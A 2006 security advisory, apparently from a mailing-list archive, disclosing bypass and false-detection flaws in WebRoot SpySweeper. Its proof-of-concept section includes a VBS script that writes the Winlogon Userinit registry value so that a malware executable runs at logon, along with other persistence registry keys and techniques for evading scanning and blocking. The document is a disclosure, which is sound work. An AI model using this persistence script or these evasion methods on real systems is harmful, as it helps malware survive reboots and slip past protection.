Multiple Bypass and Integrity Lost Vulnerabilities Jun 20 2006 01:07PM
egavriil sentinel gr


Sentinel Computer Security Advisory

Sentinel Co.

http://www.sentinel.gr

info (at) sentinel (dot) gr [email concealed]

General Flaw Description : Multiple Bypass and Integrity Lost Vulnerabilities

------------------------------------------------------------------------
-------

Advisory Information

------------------------------------------------------------------------
-------

Advisory Release Date : 2006/06/20

Advisory ID : SGA-0001

Extends : None

Deprecates : None

------------------------------------------------------------------------
-------

Product Information

------------------------------------------------------------------------
-------

Software Product Name : SpySweeper

Product Version : All to 4.5.9 Build 709

Product Vendor : WebRoot (http://www.webroot.com)

Flawed File Name : spysweeper.exe

File Version : All to 4.5.9 Build 709

Default Local Path of the File : C:\Program Files\Webroot\Spysweeper------------------------------------------------
-------------------------------

Vulnerability Information

------------------------------------------------------------------------
-------

Flaw Type : Design Flaw

Operating Systems : All Microsoft Windows

Vulnerability Impact : Bypass Security Measures

Vulnerability Rating : Critical

Patch Status : Unpatched

Advisory Status : Verified

Publicity Level : Published

Other Advisories IDs : None

Flaw Discovery Date : 2006/05/30

Patch Date : None

Vulnerability Credit : Emmanouil Gavriil (egavriil (at) sentinel (dot) gr [email concealed])

Exploit Status : Not Released

Exploit Publication Date : None

------------------------------------------------------------------------
-------

Description

-----------

WebRoot SpySweeper is an application that provides various security measures

for your computer. Some of these measures can be easily bypassed. The bypass

methods can be used by malware in order to avoid security measures provided by

SpySweeper.

Technical Information

---------------------

The following vulnerabilities have been addressed to WebRoot SpySweeper:

1) Bypassing Startup-Shield. Modifications to Registry Keys could avoid the

Security Measures provided by the Startup Shield.

2) Bypassing Compression Sweep. Compression Sweep claims to detect malware in

compressed files, but it seems that it only detects malware in files

compressed with the ZIP compression.

3) Bypassing Spy Communication Shield. Spy Communication Shield seems to check

only the domain name to be visited. Instead, if the site is visited by it's

IP address, Spy Communication Shield does not block it.

4) Integrity lost due to wrong detection of files.

Proof of Concept Experiment

---------------------------

1) The following Registry Keys can be used to bypass the startup shield:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell

HKEY_CLASSES_ROOT\exefile\shell\open\command @="\"%1\" %*"

HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\KeyName

You can use the following script to prove the vulnerability (save the

following code as .vbs):

************************************************************************
****

Dim WshShell

Set WshShell = WScript.CreateObject("WScript.Shell")

WshShell. RegWrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\", 1, "REG_BINARY"

WshShell. RegWrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit", "C:\WINDOWS\system32\userinit.exe, C:\malware.exe", "REG_SZ"

WScript. Echo "There is an entry at: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit with Value 'C:\WINDOWS\system32\userinit.exe, C:\malware.exe' After the execution of userinit.exe, malware.exe could be run!"

************************************************************************
****

2) Compressed file scanning can be bypassed by compressing to one of the

following formats:

RAR, GZ, TAR, CAB, ACE

3) Spy Communication Shield Bypass Proof of Concept:

banners.pennyweb.com should be blocked.

63.208.235.96 is not blocked.

4) 90.dl and or 51.dl are valid ARRISCAD (www.arriscad.com) drawing list files.

SpySweeper tends to remove those files. Such a removal action could destroy

an arriscad database. Furthermore is quite interesting why even an empty

file with the name 90.dl or ieonflow.dll can be considered adware or

spyware. Additionally the renaming of some malware files (ex. ieonflow.dll)

avoids the detection as malware from the SpySweeper.

Patch Description and Information

---------------------------------

Vendor informed. No reply yet. No patch released yet.

References and Other Resources for Information

----------------------------------------------

None.

EOF.

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus